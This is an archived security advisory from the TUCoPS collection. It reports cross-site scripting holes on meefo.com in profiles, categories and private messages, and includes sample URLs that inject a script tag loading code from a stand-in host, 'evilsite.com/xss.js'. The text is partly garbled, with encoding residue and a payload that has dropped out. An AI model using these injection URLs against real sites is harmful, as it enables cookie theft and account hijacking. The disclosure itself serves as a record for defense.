TUCoPS :: Web :: Specific Sites :: b06-2942.htm

Meefo.com - XSS with cookie include
Meefo.com - XSS with cookie include
Meefo.com - XSS with cookie include


Meefo.com=0D
=0D
Homepage:=0D
http://meefo.com=0D 
=0D
Effected files:=0D
reading profiles=0D
index.php=0D
input boxes onprofiles=0D
sending private msgs=0D
=0D
------------------------------=0D
=0D
Reading aprofile and with cookie include PoC:=0D
Since data isn't properlly filtered (backslashes are added to ' and "), a user can input malicious data, such as =0D
=0D
 and itwill popup with the users cookie. Incldued at the end of this article are =0D
=0D
screenshots of the cookie vuln. Screenshots meefo4 and meefo5.jpg show this.=0D
=0D
http://meefo.com/?do=rdprof&user_pp=username=0D 
=0D
When editing your profile, data isn't properally filtered in theinput boxes either, so =0D">SRC=http://evilsite.com/xss.js>=0D 
=0D
Reading catagories XSS Vuln:=0D
http://meefo.com/index.php?cat=Poetry SRC=http://evilsite.com/xss.js>=0D 
=0D
Sending PM's XSS Vuln:=0D
http://meefo.com/?messages=send&to= SRC=http://evilsite.com/xss.js>=0D 
=0D
=0D
Screenshots of cookie include vulns & more:=0D
=0D
http://www.youfucktard.com/xsp/meefo1.jpg=0D 
http://www.youfucktard.com/xsp/meefo2.jpg=0D 
http://www.youfucktard.com/xsp/meefo3.jpg=0D 
http://www.youfucktard.com/xsp/meefo4.jpg=0D 
http://www.youfucktard.com/xsp/meefo5.jpg=0D 
http://www.youfucktard.com/xsp/meefo6.jpg

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH